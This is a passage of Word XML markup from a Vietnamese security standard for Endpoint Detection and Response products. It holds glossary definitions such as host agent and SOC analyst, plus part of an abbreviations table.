          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Đăng ký </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Enroll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99B76D" w14:textId="67F7057A" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Hành động đăng ký điểm cuối </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> với EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E7FCE" w14:textId="6C5D83B7" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tác nhân máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Host Agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19C5F3" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Phần mềm bổ sung thực thi trên các điểm cuối để thu thập dữ liệu về điểm cuối và thực hiện các lệnh được gửi đến điểm cuối từ máy chủ hoặc dịch vụ Quản lý Bảo mật Doanh nghiệp (ESM). Một lệnh mẫu được gửi đến điểm cuối có thể để thực thi chính sách từ ESM, nhằm thu thập một số tệp hoặc chạy lệnh hệ điều hành.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBB307" w14:textId="449BDEB5" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Giao diện quản lý </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Management Dashboard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FCC6A" w14:textId="14440822" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Giao diện quản lý cho cấu hình chính sách EDR, trực quan hóa thu thập dữ liệu cảnh báo điểm cuối và ban hành lệnh khắc phục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071D32D" w14:textId="4D616947" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hoạt động có khả năng trái phép</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Potentially Unauthorized Activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF48EE" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Điều này đề cập đến tập hợp các hành động được phát hiện bởi TOE, các mục cụ thể được phát hiện có thể là duy nhất đối với TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D954B" w14:textId="32F26063" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(SOC Analyst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD69BC" w14:textId="5622F2E8" w:rsidR="002C4D0B" w:rsidRPr="00204C5F" w:rsidRDefault="00B75CA6" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>Chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">rung tâm </w:t>
      </w:r>
      <w:r w:rsidR="007612D9" w:rsidRPr="00204C5F">
        <w:t>điều hành</w:t>
      </w:r>
      <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
        <w:t>an toàn thông tin</w:t>
      </w:r>
      <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> (SOC) thường là người chịu trách nhiệm xem xét các hoạt động có khả năng trái phép thông qua các cảnh báo để thực hiện khắc phục và xử lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A408414" w14:textId="77777777" w:rsidR="006F029D" w:rsidRPr="00204C5F" w:rsidRDefault="006F029D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc502652891"/>
      <w:bookmarkStart w:id="10" w:name="_Toc137476355"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Ký hiệu và </w:t>
      </w:r>
      <w:r w:rsidR="004C2856" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chữ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> viết tắt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10031" w:type="dxa"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1463"/>
        <w:gridCol w:w="4341"/>
        <w:gridCol w:w="4227"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="5F0EEA6F" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AAB8B25" w14:textId="41ABC7B7" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3205E0D6" w14:textId="4AE94AFE" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Endpoint Detection and Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="268F35C7" w14:textId="4C365BEF" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Phát hiện và phản hồi điểm cuối</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="338E4C2C" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A4487AE" w14:textId="1225FDD9" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>AV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1215F282" w14:textId="3E86EFFA" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Antivirus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0525F6" w14:textId="7A86E983" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Phần mềm diệt vi rút</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="73965607" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="750D0CEC" w14:textId="73C960E3" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>EAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B5AAE1" w14:textId="27235016" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Evaluation Assurance Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24693801" w14:textId="4D3BD8A3" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Mức bảo đảm đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="2A1D4158" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696F3850" w14:textId="7895C4E7" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>GUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD032F2" w14:textId="095BD2BB" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Graphical User Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503F5E9B" w14:textId="57F5287E" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Giao diện người dùng dạng đồ họa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="28A6D526" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F608910" w14:textId="141AF10F" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7576F836" w14:textId="26AC5598" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Internet Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701D21CE" w14:textId="42A31A62" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Giao thức Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="0AD4E31F" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="234BC948" w14:textId="63A9F348" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D7584A8" w14:textId="7FE26FFB" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106EEF09" w14:textId="62E55607" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Giao diện lập trình ứng dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="07CAAE3D" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2419CE3E" w14:textId="2130A5E3" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>OSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D09D9EC" w14:textId="7F83C9A4" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Organizational Security Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF9EB74" w14:textId="6AD4B5BF" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Chính sách an toàn của tổ chức</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="0D700873" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="058B1F9F" w14:textId="18D07D06" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4548D8D9" w14:textId="211D9DCE" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Personal Computer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B3DE9E" w14:textId="7576B30E" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Máy tính cá nhân</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="5B404806" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3523A478" w14:textId="30371843" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3369696F" w14:textId="5B3F8CF9" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Protection Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFE98FE" w14:textId="759FB74F" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Hồ sơ bảo vệ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="14BFD44B" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
